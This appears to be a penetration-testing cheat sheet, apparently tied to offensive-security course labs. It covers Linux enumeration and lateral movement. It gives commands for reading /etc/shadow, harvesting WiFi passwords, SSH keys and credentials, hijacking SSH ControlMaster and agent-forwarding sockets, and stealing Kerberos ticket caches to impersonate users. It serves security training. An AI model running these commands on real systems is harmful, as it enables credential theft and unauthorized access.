Linux
Introduction
This section contains some useful commands that will help you enumerate the Linux system, obtaining helpful information for a later Privilege Escalation or Lateral movements.
User and group enumeration
Print real and effective user and group IDs from the current user:
id
List all users, groups and shells for each user:
cat /etc/passwd
List user accounts who does not require password:
sudo awk -F: '($2==""){print}' /etc/shadow
List the allowed (and forbidden) commands for the invoking or specified (
-u
) user:sudo -l
List all existing groups:
cat /etc/group | sort
Print executed commands (Looking for credentials):
{cat ~/.bash_history} | {history}
Operative System
Architecture:
uname -a
Environment variables:
env
Network Enumeration
List network interfaces:
ip -br a
List all connections:
netstat -putona
List only listening ports:
netstat pluton | ss -pltn
List hardcoded domains:
cat /etc/hosts
List iptables:
iptables -L
Outgoing connections to a specific IP:
ss -anpt | grep <NETWORK> | grep ESTAB
Real-time traffic monitoring:
tcpdump -i <if> -s0 -n -vv
Obtian WiFi passwords:
sudo grep psk= /etc/NetworkManager/system-connections/*
Files enumeration
Files owned by a user
There might be files owned by a specific user stored in hidden folders.
find / -type f -user <user> -or -group <group> 2>/dev/null | grep -v ^/proc
Modified files
There might be files being modified with a cronjob or during a workday.
find / -type f -newermt <start date range> ! -newermt <end date range>
Accessed files
There might be files being accessed with a cronjob or during a workday.
find / -type f -newerat <start date range> ! -newerat <end date range>
Disks
List mounted disks at Linux startup.
cat /etc/fstab
Password Enumeration
Look for files that contain passwords or keys.
# Passwords
grep -rnw '/' -ie "passw" --color=always 2>/dev/null
cat ~/.bash_history | grep -i passw
# Find SSH keys
find / -type f -name id_rsa 2>/dev/null
grep -rnw '/' -ie "private key" --color=always 2>/dev/null
Cronjobs
List scheduled jobs.
cat /etc/crontab
crontabe -e
SSH
Find SSH keys:
find /home/ -iname "id_rsa"
find /home/ -iname "*.key"
Control Master
When ControlMaster is enabled, the initial SSH connection (the master connection) is established, and subsequent connections (slave connections) can reuse the existing master connection. This can lead to faster connection times and reduced resource usage, especially when connecting to the same remote server multiple times.
If an attacker gains access to a system where SSH ControlMaster is in use, they might exploit the existing master connection to execute commands or perform other malicious activities without the need to authenticate repeatedly.
Check if the file
~/.ssh/config
exists with the following configuration. Meaning, that ControlMaster is enabled.
Host *
ControlPath ~/.ssh/controlmaster/%r@%h:%p
ControlMaster auto
ControlPersist 10m
Look for any active connection under
~/.ssh/controlmaster/
.
offsec@controller:~$ ls -al ~/.ssh/controlmaster/
total 8
drwxrwxr-x 2 offsec offsec 4096 May 13 13:55 .
drwx------ 3 offsec offsec 4096 May 13 13:55 ..
srw------- 1 offsec offsec 0 May 13 13:55 offsec@linuxvictim:22
Use the existing connection to perform lateral movement.
User: If you are the user to whom the connection file belongs, simply SSH to the session.
offsec@linuxvictim:22
Root:
ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim
SSH Agent Forwarding
SSH Agent Forwarding allows the SSH-Agent on a local machine to be used for authentication when connecting to remote servers.
If an attacker gains access to a machine where Agent Forwarding is active, they might abuse the forwarded agent connection to authenticate to other machines.
Check if ~/.ssh/config
contains ForwardAgent yes
or the SSH configuration /etc/ssh/sshd_config
on the server must have AllowAgentForwarding yes
. Then, check if there is any active connection.
ps aux | grep ssh
User: If you are the user to whom the connection belongs, simply SSH to the session. Then, simply execute the SSH command to automatically access the other computer.
Root: Inspect processes with "ssh" in the name, we will find any open connections from the host. We can use the usernames listed in these connections with the pstree command to get the process ID (PID) values for the SSH processes.
pstree -p <USER> | grep ssh
sshd(15228)---bash(15229)---su(15241)---bash(15242)
sshd(16380)---bash(16381)
Then, we extract the SSH_AUTH_SOCK
environment variable from their connection to obtain the stored SSH socket.
cat /proc/16381/environ
After that, we need to add it:
root@controller:~# SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l
Finally, we can try to access the target we might have in mind that the victim is connecting to or look for clues in order to see where our victim is connecting to.
ss -ntp | grep 22 | grep -i ssh
Kerberos
Kerberos tickets can also be found on Linux machines that belong to Active Directory domains. Enumerating the machine looking for Kerberos information can be crucial to perform lateral movement to other machines on the domain.
Obtain domain information from the kerberos configuration file.
cat /etc/krb5.conf
Find KRB user cache credentials.
find /tmp/ -type f -iname "*krb5cc_*" 2>/dev/null
Impersonate user using
krb5cc_
files.
sudo cp /tmp/krb5cc_* /tmp/krb5cc_minenow
sudo chown <ATTACKER_USER>:<ATTACKER_USER> /tmp/krb5cc_minenow
kdestroy
export KRB5CCNAME=/tmp/krb5cc_minenow
klist
Find keytab files.
find / -type f -iname "*.keytab" 2>/dev/null
ls /etc/krb5.*
Extract keytab information like domain, service principal and NTLM hash.
python3 KeyTabExtract/keytabextract.py krb5.keytab
List tickets currently stored in the user’s credential cache file.
klist
Convert a Mimikatz ticket to ccache.
ticketConverter.py adminWebSvc.kirbi adminWebSvc.ccache
export KRB5CCNAME=/var/www/html/OSEP/Challenge6/adminWebSvc.ccache
Last updated